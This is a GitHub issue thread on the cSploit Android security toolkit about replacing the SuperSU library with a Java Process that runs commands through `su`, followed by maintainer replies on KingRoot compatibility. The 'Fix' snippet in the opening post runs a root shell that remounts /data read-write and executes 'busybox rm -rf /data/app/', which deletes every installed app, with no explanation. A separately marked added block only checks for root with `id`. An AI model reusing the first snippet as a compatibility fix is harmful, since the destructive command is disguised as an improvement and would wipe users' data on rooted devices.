cSploit / android

cSploit - The most complete and advanced IT security professional toolkit on Android.
http://www.csploit.org/
GNU General Public License v3.0
3.29k stars 1.1k forks

Fix | bash local code execution #768

Open cioccarellia opened 7 years ago

cioccarellia commented 7 years ago

Instead of using SuperSu library for executing scripts or commands, use a Process. LibSuperUser is very old and it is compatible only with super-su and super-su based root managers.

This execution method is compatible with all SU-managers and it also uses a small number of resources.

```java
import java.io.DataOutputStream;
import java.io.IOException;

final String[] shellCode = {"cd /", "mount -o remount,rw /data", "busybox rm -rf /data/app/", "killall org.csploit.android"};
try {
    // exec() can itself throw IOException when no su binary exists, so it belongs inside the try
    final Process rootfs = Runtime.getRuntime().exec("su"); // Start a root shell process
    // try-with-resources closes the shell's stdin even if a write fails
    try (DataOutputStream os = new DataOutputStream(rootfs.getOutputStream())) {
        for (String tmpCmd : shellCode) { // Each element of the array is executed in the root process
            os.writeBytes(tmpCmd + "\n");
        }
        os.writeBytes("exit\n");
        os.flush();
    }
} catch (IOException e) {
    Runtime.getRuntime().exit(1); // No root detected
}
```

If you replace the old code-execution method with this, all users can use cSploit, even if they don't have SuperSu.
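An added example, not part of the original thread and not cSploit's own code: before sending any commands through a `su` process, an app can confirm that the shell it was given really runs as uid 0, which separates "no su binary" from "root manager refused the request". The class name `RootProbe` and its `Status` enum are hypothetical, and the sketch assumes `su` starts a shell that reads commands from standard input, as the snippet above does.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;

public final class RootProbe { // hypothetical helper, not a cSploit class
    public enum Status { GRANTED, DENIED, NO_SU_BINARY }

    // Asks the given su binary for a shell and reports whether it really runs as uid 0.
    public static Status probe(String suBinary) throws InterruptedException {
        final Process su;
        try {
            // Merge stderr into stdout so a single reader drains both pipes.
            su = new ProcessBuilder(suBinary).redirectErrorStream(true).start();
        } catch (IOException e) {
            return Status.NO_SU_BINARY; // exec itself failed: no su on PATH
        }
        try (OutputStream stdin = su.getOutputStream()) {
            stdin.write("id\nexit\n".getBytes(StandardCharsets.UTF_8));
        } catch (IOException e) {
            // su closed its input early, usually because the request was refused;
            // the output and exit code below decide the result.
        }
        boolean sawRootUid = false;
        try (BufferedReader out = new BufferedReader(
                new InputStreamReader(su.getInputStream(), StandardCharsets.UTF_8))) {
            String line;
            while ((line = out.readLine()) != null) { // read to EOF so su never blocks on a full pipe
                if (line.startsWith("uid=0(")) {
                    sawRootUid = true;
                }
            }
        } catch (IOException e) {
            // An unreadable stream gives no proof of root; fall through to DENIED.
        }
        int exitCode = su.waitFor();
        return (exitCode == 0 && sawRootUid) ? Status.GRANTED : Status.DENIED;
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("su status: " + probe("su"));
    }
}
```

A `DENIED` result lets the app tell the user to check the root manager's per-app permission entry instead of exiting silently.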

IwraStudios commented 7 years ago

Thanks @AndreaCioccarelli, I will look at it later.

tux-mind commented 7 years ago

Hi @AndreaCioccarelli, glad to see you here :blush:

I remember that I already did that in 94e6bbbed7c2a89778863e43a09f3f97b385e05d, a long, long time ago.

AFAIK the Process strategy is the one already used in cSploit as stated here.

But please feel free to propose any improvement, we will be happy to review them :smiley:

cioccarellia commented 7 years ago

There is one thing I have not understood: why are KingRoot binaries incompatible with cSploit?

tux-mind commented 7 years ago

I've successfully used cSploit with devices rooted with KingRoot (Galaxy J3). AFAIK you need the companion app KingUser to manage super user permissions.

Do you have it on the device? Did you check its settings for cSploit?

In SuperSU there is a preference that prevents re-installed apps from gaining root access, even if you granted it before. Moreover, sometimes I had to delete the permission settings for cSploit from SuperSU after re-installing (e.g. re-deploying) the apk.

Please give those tricks a try with KingUser and let us know if the problem is solved :)

Kind regards :)